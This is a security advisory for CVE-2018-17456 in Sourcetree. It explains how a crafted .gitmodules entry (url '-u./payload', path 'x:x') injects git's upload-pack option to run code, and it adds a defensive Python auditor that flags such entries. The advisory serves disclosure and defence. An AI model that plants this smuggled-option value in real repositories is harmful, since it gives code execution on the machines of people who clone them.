ASA-2019-00128 – Sourcetree: Input validation vulnerability via Git submodules

Affected version(s)

Sourcetree for macOS starting with 1.2 before version 3.1.1
Sourcetree for Windows starting with 0.5a before version 3.0.17

Fixed version(s)

Sourcetree for macOS version 3.1.1
Sourcetree for Windows version 3.0.17

Proof of concept

Sourcetree for macOS before version 3.1.1 and Sourcetree for Windows before version 3.0.17 were both vulnerable to CVE-2018-17456. A remote attacker with permission to commit to a git repository linked in Sourcetree for macOS or Windows is able to exploit this issue to gain code execution on the system.

Technical details

The .gitmodules file looks as follows:

[submodule "x:x"]
path = x:x
url = -u./payload

The injected argument comes from the url value: -u./payload sets the upload-pack option (-u) of git clone to the payload shell script. Note also the : within the path; this part is needed to actually get the payload script executed.

The path will end up as the repository URL in the subsequent clone operation:

execve("/usr/lib/git-core/git", ["/usr/lib/git-core/git", "clone",
"--no-checkout", "--progress", "--separate-git-dir",
"/tmp/huhu/.git/modules/x:x", "-u./payload", "/tmp/huhu/x:x"],...

The actual URL from .gitmodules is instead consumed as the argument of the -u option.

The colon is needed because it lets the URL get past these lines in transport.c:

} else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {
    struct bundle_transport_data *data = xcalloc(1, sizeof(*data));
    ret->data = data;
    ret->vtable = &bundle_vtable;
    ret->smart_options = NULL;

url_is_local_not_ssh returns false because of the colon in the path, so later in the code the smart_options containing the uploadpack setting are still in place:

} else {
    /* Unknown protocol in URL. Pass to external handler. */
    int len = external_specification_len(url);
    char *handler = xmemdupz(url, len);
    transport_helper_init(ret, handler);

    if (ret->smart_options) {
        ret->smart_options->thin = 1;
        ret->smart_options->uploadpack = "git-upload-pack";
        if (remote->uploadpack)
            ret->smart_options->uploadpack = remote->uploadpack;
        ret->smart_options->receivepack = "git-receive-pack";
        if (remote->receivepack)
            ret->smart_options->receivepack = remote->receivepack;

The requirement to have a colon in the path seems to hinder exploitation on Windows, as a colon is a forbidden character within a path on Windows. However, as noted by some people during the disclosure, Git running within the Windows Subsystem for Linux or Cygwin will allow exploitation on Windows hosts.
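As an added defender-side check, not part of the advisory, of Sourcetree or of git itself, the script below parses a .gitmodules file and flags the two traits described above: a url or path that starts with a dash, which the fixed git releases listed in the references reject, and a colon in the path. The sample input is constructed from the entry shown above plus one benign submodule.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the .gitmodules from the advisory plus one benign submodule.
SAMPLE_GITMODULES = """\
[submodule "lib"]
\tpath = lib
\turl = https://example.invalid/lib.git
[submodule "x:x"]
\tpath = x:x
\turl = -u./payload
"""

SECTION_RE = re.compile(r'^\s*\[submodule\s+"([^"]*)"\]\s*$')
KEY_RE = re.compile(r'^\s*(\w+)\s*=\s*(.*?)\s*$')

def parse_gitmodules(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for the subset of git-config syntax that .gitmodules uses."""
    modules: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue  # blank line or comment
        m = SECTION_RE.match(line)
        if m:
            current = modules.setdefault(m.group(1), {})
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2)
    return modules

def audit_gitmodules(text: str) -> List[Tuple[str, str]]:
    """Return (submodule name, finding) pairs for entries that look like option injection."""
    findings: List[Tuple[str, str]] = []
    for name, entry in parse_gitmodules(text).items():
        url, path = entry.get("url", ""), entry.get("path", "")
        # A leading dash makes "git clone" read the value as an option (here -u,
        # i.e. --upload-pack) instead of a URL or path; fixed git releases reject it.
        if url.startswith("-"):
            findings.append((name, f"url starts with '-': {url!r}"))
        if path.startswith("-"):
            findings.append((name, f"path starts with '-': {path!r}"))
        # The colon is what the PoC relies on; flagged for review (assumption: suspicious, not rejected by git).
        if ":" in path:
            findings.append((name, f"path contains ':': {path!r}"))
    return findings
```

Running audit_gitmodules(SAMPLE_GITMODULES) returns two findings, both for the "x:x" entry: the dash-prefixed url and the colon in the path.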


Terry Zhang (Tophant)

Sourcetree Security Advisory 2019-03-06

Input validation vulnerability via Git in Sourcetree for Mac – CVE-2018-17456

Input validation vulnerability via Git in Sourcetree for Windows – CVE-2018-17456

[Announce] Git 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1

RCE via Git submodules PoC

Last modified: March 12, 2019